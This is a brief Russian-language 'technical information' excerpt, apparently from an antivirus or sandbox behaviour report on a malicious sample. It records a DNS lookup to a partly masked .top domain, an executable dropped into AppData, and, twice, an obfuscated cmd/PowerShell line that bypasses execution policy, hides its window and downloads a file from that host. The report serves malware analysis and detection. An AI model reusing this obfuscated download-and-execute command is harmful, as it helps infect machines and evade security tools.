Техническая информация
- http://www.do###sope.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwersheLl.exE -e^X^E^cUt^IOnPo^Lic^y^ Bypa^SS^ -No^P^r^ofi^Le^ -wInD^O^WsTYlE HIdDe^N ^(New-O^bJeCT^ sYstem.nEt^.web^cLIeNT).^D^Ow^nlOadfi^L^e('http://www.do###sope.top/read.ph...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^OwersheLl.exE -e^X^E^cUt^IOnPo^Lic^y^ Bypa^SS^ -No^P^r^ofi^Le^ -wInD^O^WsTYlE HIdDe^N ^(New-O^bJeCT^ sYstem.nEt^.web^cLIeNT).^D^Ow^nlOadfi^L^e('http://www.do###sope.top/read.ph...' (со скрытым окном)